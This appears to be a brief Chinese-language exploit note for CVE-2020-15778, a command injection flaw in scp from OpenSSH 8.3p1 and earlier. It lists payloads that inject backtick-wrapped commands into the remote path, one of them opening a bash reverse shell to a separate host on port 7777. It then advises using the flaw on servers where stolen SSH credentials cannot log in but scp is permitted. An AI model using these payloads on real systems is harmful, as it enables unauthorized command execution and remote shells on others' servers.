SourceURL:
漏洞標題:OpenSSH 8.3p1中的scp允許進行eval注入
發現人:Chinmay Pandya
產品:Openssh
受影響的組件:SCP
漏洞版本:<= openssh-8.3p1
CVE編號:CVE-2020-15778
payload
scp 1.txt root@ip:'`touch /root/test2.txt`/root/12111.txt'
scp test.txt test@192.168.136.133:'`bash -i >& /dev/tcp/192.168.136.129/7777 0>&1`/tmp/test3.txt'
實際環境中的利用方案以及場景:
對於用戶來說,ssh被阻止,但authorized_keys文件中的命令選項允許使用scp的情況。您可以繞過此限制並在遠程服務器上執行命令。也就是說,實際中通過各種手段獲取到了ssh的用戶密碼,但是不允許ssh連接,或者ip等各種限制,可以嘗試此漏洞進行利用